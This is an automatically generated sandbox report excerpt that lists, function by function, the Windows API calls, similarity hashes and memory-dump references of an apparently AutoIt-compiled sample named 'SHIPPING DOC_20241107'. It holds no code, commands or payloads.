                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3277943733-0
                                                                                                                              • Opcode ID: af11a5a8e7059dd9e55c484d74e010957503f0f8d06432fdc406ffa77bca5e4c
                                                                                                                              • Instruction ID: 41a71a6ad40a8fc622165b3afbd88a9f25de6ac3574c2876f81416030ca2884e
                                                                                                                              • Opcode Fuzzy Hash: af11a5a8e7059dd9e55c484d74e010957503f0f8d06432fdc406ffa77bca5e4c
                                                                                                                              • Instruction Fuzzy Hash: 43F082B2650704BEE210BBA5BC06FBB3A5CEB09394F00C435FA0CDA1A2D7715C018BB8
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A16C8F
                                                                                                                                • Part of subcall function 00A1776D: _memset.LIBCMT ref: 00A177A2
                                                                                                                              • _memmove.LIBCMT ref: 00A16CB2
                                                                                                                              • _memset.LIBCMT ref: 00A16CBF
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A16CCF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48991266-0
                                                                                                                              • Opcode ID: 90582f531c1951515b4c7427b1894d39e599c3e3656cd44d6d4e44f2340ac46d
                                                                                                                              • Instruction ID: fe8b64ac5d6957fffa19492157e1ab6b782e8b8888a7c6b12d70ed39d527fbc3
                                                                                                                              • Opcode Fuzzy Hash: 90582f531c1951515b4c7427b1894d39e599c3e3656cd44d6d4e44f2340ac46d
                                                                                                                              • Instruction Fuzzy Hash: A6F05E3A600104ABCF416F95DD85E8ABB2AEF85320F14C065FE085E26AC771A852CBB4
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A0A179
                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A0A18C
                                                                                                                              • GetCurrentThreadId.KERNEL32(00000000), ref: 00A0A193
                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 00A0A19A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2710830443-0
                                                                                                                              • Opcode ID: 5429618d05b47624bd20d45d737069a1cc5ebf6dc32ab81e9f2d2cdc79502401
                                                                                                                              • Instruction ID: ca31704b1d6b35e1534dc96fd12fc93e4fe1718240b9f995be98732271e33099
                                                                                                                              • Opcode Fuzzy Hash: 5429618d05b47624bd20d45d737069a1cc5ebf6dc32ab81e9f2d2cdc79502401
                                                                                                                              • Instruction Fuzzy Hash: 95E0C931945368BBDB209BA2EC0DED77F5CEF267A1F408125F609950A0C7718541CBA1
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(00000008,00000000), ref: 009B2231
                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 009B223B
                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 009B2250
                                                                                                                              • GetStockObject.GDI32(00000005), ref: 009B2258
                                                                                                                              • GetWindowDC.USER32(?), ref: 009EC003
                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009EC010
                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 009EC029
                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 009EC042
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 009EC062
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 009EC06D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1946975507-0
                                                                                                                              • Opcode ID: ba2cdcafdbff218d3b94a51fba82b49775da1c188ac04452ff899344631ee8c9
                                                                                                                              • Instruction ID: 98e6f047164f1cfeaf3dd46c1b4c007ef80103dcbc74aa25f112dc47d5b9b1d9
                                                                                                                              • Opcode Fuzzy Hash: ba2cdcafdbff218d3b94a51fba82b49775da1c188ac04452ff899344631ee8c9
                                                                                                                              • Instruction Fuzzy Hash: A2E03932910284FEEF219FA4FC0DBD83B14EB05332F008366FA69980E187714992DB11
                                                                                                                              APIs
                                                                                                                              • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00A084BD,?,?,?,00A0860E), ref: 00A08A43
                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A0860E), ref: 00A08A4A
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A0860E), ref: 00A08A57
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A0860E), ref: 00A08A5E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3974789173-0
                                                                                                                              • Opcode ID: 28ae1899870226d236cfa40700b261b355ce1e8d94c9de407f0e55cfb6fd7ea0
                                                                                                                              • Instruction ID: a71612fd8322d388b1bd26aeeaeb4d77ff1a1407ce1d40bd56e991b54cef1be7
                                                                                                                              • Opcode Fuzzy Hash: 28ae1899870226d236cfa40700b261b355ce1e8d94c9de407f0e55cfb6fd7ea0
                                                                                                                              • Instruction Fuzzy Hash: 3AE08636B11221DFD7609FF46D0CB973BACEF517D2F054829B685DA090EA349542C750
                                                                                                                              APIs
                                                                                                                              • GetDesktopWindow.USER32 ref: 009F20B6
                                                                                                                              • GetDC.USER32(00000000), ref: 009F20C0
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009F20E0
                                                                                                                              • ReleaseDC.USER32(?), ref: 009F2101
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: 616a4c1ab9161d9b8fea1d232b90b0546e286964132a9ffe4dbf1c3544ca4047
                                                                                                                              • Instruction ID: 2d3ad084df4479babffc039c94a25162e6cb311357707408e2de9c0da30f7448
                                                                                                                              • Opcode Fuzzy Hash: 616a4c1ab9161d9b8fea1d232b90b0546e286964132a9ffe4dbf1c3544ca4047
                                                                                                                              • Instruction Fuzzy Hash: 3DE0E5B5810204EFCB019FA0DD09AADBBF1EB4C320F108425F95AA7220DB3881429F40
                                                                                                                              APIs
                                                                                                                              • GetDesktopWindow.USER32 ref: 009F20CA
                                                                                                                              • GetDC.USER32(00000000), ref: 009F20D4
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009F20E0
                                                                                                                              • ReleaseDC.USER32(?), ref: 009F2101
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: 6b21731f688bf44d5b62f92c57cea832b32e7ab581e0a8b2ac1b8c620773e58a
                                                                                                                              • Instruction ID: 6e9261cfd01848126f814a32ad2cbbf2fd425e584846720e6fedde83e6679952
                                                                                                                              • Opcode Fuzzy Hash: 6b21731f688bf44d5b62f92c57cea832b32e7ab581e0a8b2ac1b8c620773e58a
                                                                                                                              • Instruction Fuzzy Hash: 26E012B5C20204AFCB019FB0DE0AA9DBBF1EB4C320F108429F95AA7220DB3891429F40
                                                                                                                              APIs
                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00A0B780
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContainedObject
                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                              • API String ID: 3565006973-3941886329
                                                                                                                              • Opcode ID: d93c163137b81f285e7915f7d4a3acb5108318599a3e8cdddb7adb9508de5c4c
                                                                                                                              • Instruction ID: 9f35676fab48941afa9a840225b380247b4583737f66fe811151b610acf8982b
                                                                                                                              • Opcode Fuzzy Hash: d93c163137b81f285e7915f7d4a3acb5108318599a3e8cdddb7adb9508de5c4c
                                                                                                                              • Instruction Fuzzy Hash: DE915C70610205AFDB14DF68D994B6ABBF8FF48710F14856DF90ACB2A1DB71E844CB60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009CFE06: _wcscpy.LIBCMT ref: 009CFE29
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • __wcsnicmp.LIBCMT ref: 00A1B0B9
                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A1B182
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                              • String ID: LPT
                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                              • Opcode ID: 38f2fc41513c6c751e7a97ea730715814075b0144556084baeeb80405308aa59
                                                                                                                              • Instruction ID: 7ec8d27a9b7689ed03589009a79c2b917db596eccabc5e2ef25bd840a6becb7b
                                                                                                                              • Opcode Fuzzy Hash: 38f2fc41513c6c751e7a97ea730715814075b0144556084baeeb80405308aa59
                                                                                                                              • Instruction Fuzzy Hash: A661B075A10215AFCB14DF98C895FEEB7B5EF48310F054169F546AB391DB30AE84CBA0
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 009C2AC8
                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 009C2AE1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                              • Opcode ID: 1c9cb23fe5cae3333925e0bc85012a03a7953bcbe7b8af869dd1ccc92feb2933
                                                                                                                              • Instruction ID: fc49179ee24d8b779cfebc68e2c71708dd0b0365316cd2f8cac443a0b01a5790
                                                                                                                              • Opcode Fuzzy Hash: 1c9cb23fe5cae3333925e0bc85012a03a7953bcbe7b8af869dd1ccc92feb2933
                                                                                                                              • Instruction Fuzzy Hash: 995166724287449BD320EF60DD86BABBBF8FBC5324F41884DF2D9511A1DB308569CB66
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B506B: __fread_nolock.LIBCMT ref: 009B5089
                                                                                                                              • _wcscmp.LIBCMT ref: 00A198CD
                                                                                                                              • _wcscmp.LIBCMT ref: 00A198E0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                                                              • String ID: FILE
                                                                                                                              • API String ID: 4029003684-3121273764
                                                                                                                              • Opcode ID: c8945867ba854b1269b856f742e7a91341fd63073849f1bb46741f81ea160773
                                                                                                                              • Instruction ID: b2fee4e3a15c4a5c69167e5f411759cdb2b707cff2283bdf9f3dfc4b33d6dadf
                                                                                                                              • Opcode Fuzzy Hash: c8945867ba854b1269b856f742e7a91341fd63073849f1bb46741f81ea160773
                                                                                                                              • Instruction Fuzzy Hash: B641F871A00609BADF20ABA0CD85FEF77BDDF85710F014469B904A7280DA71AE45C7A1
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A226B4
                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A226EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                              • String ID: |
                                                                                                                              • API String ID: 1413715105-2343686810
                                                                                                                              • Opcode ID: 14bb8bc2e2cf2e774ffa6598a823617cc8ef4981dd86e637dbe3e038c52ac630
                                                                                                                              • Instruction ID: ebf629399af7f940b8761eb93bfdcdcde0940c7ab00d2b0c77e6920f707d3ec3
                                                                                                                              • Opcode Fuzzy Hash: 14bb8bc2e2cf2e774ffa6598a823617cc8ef4981dd86e637dbe3e038c52ac630
                                                                                                                              • Instruction Fuzzy Hash: 5C315871804119AFCF01EFA4DD85EEEBFB9FF48320F100169F815A6266EB315A46DB60
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A37B93
                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A37BA8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: '
                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                              • Opcode ID: f929697c2b16f213a334a2ef3b41e5dfb256577230ceaa3ddee8e5ac812a84fa
                                                                                                                              • Instruction ID: 4dd4e95d6c20efdd5540634852156c8702af8bd0735f831ea0a0dd2490b8c763
                                                                                                                              • Opcode Fuzzy Hash: f929697c2b16f213a334a2ef3b41e5dfb256577230ceaa3ddee8e5ac812a84fa
                                                                                                                              • Instruction Fuzzy Hash: 3D41F7B4A0520A9FDB24CFA9C981BDEBBB5FB09340F14416AE905AB391D770A941CF90
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32 ref: 00A36B49
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00A36B85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                              • Opcode ID: 3457b303bb1eb08e87a5fa9659f22dad87d2ebb9eeccbd739cf38c3498331c34
                                                                                                                              • Instruction ID: 9b4d58116549fafb27826ce41a37a93bc24d04f557dae1246061cc60b072af3b
                                                                                                                              • Opcode Fuzzy Hash: 3457b303bb1eb08e87a5fa9659f22dad87d2ebb9eeccbd739cf38c3498331c34
                                                                                                                              • Instruction Fuzzy Hash: 7B315871510604AAEB109F64CC81BFBB7B9FF88760F108619F9A9D7190DA30AC81CB60
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                              • Opcode ID: 3e1e6134b22961fa8c036a0beabd4c6c17072edb0f70f6b7570fd56700b2c756
                                                                                                                              • Instruction ID: f1549d2d7a2ee0d583b530ce9ea6309afed2261e5c17d763e47baa71d52c09d8
                                                                                                                              • Opcode Fuzzy Hash: 3e1e6134b22961fa8c036a0beabd4c6c17072edb0f70f6b7570fd56700b2c756
                                                                                                                              • Instruction Fuzzy Hash: BE31C531A002059FEB34CF58D985BEEBBB5EB45350F144019EA85A61A0D770DA90CB90
                                                                                                                              APIs
                                                                                                                              • __snwprintf.LIBCMT ref: 00A23B7C
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                              • API String ID: 3506404897-2584243854
                                                                                                                              • Opcode ID: 7fa1f66361b85d0529c2f38c7f84a12df103389a56e8c58d47906d76404a5b19
                                                                                                                              • Instruction ID: 767aee5489b4f2d31f6d7dd7d0a261b76c9338262563c7f9b7c8f5496270cbd6
                                                                                                                              • Opcode Fuzzy Hash: 7fa1f66361b85d0529c2f38c7f84a12df103389a56e8c58d47906d76404a5b19
                                                                                                                              • Instruction Fuzzy Hash: 00216431600128ABCF10EFA8DD82EEEB7B9FF85710F4045A5F505AB181DA34DA45CBA1
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A36793
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A3679E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
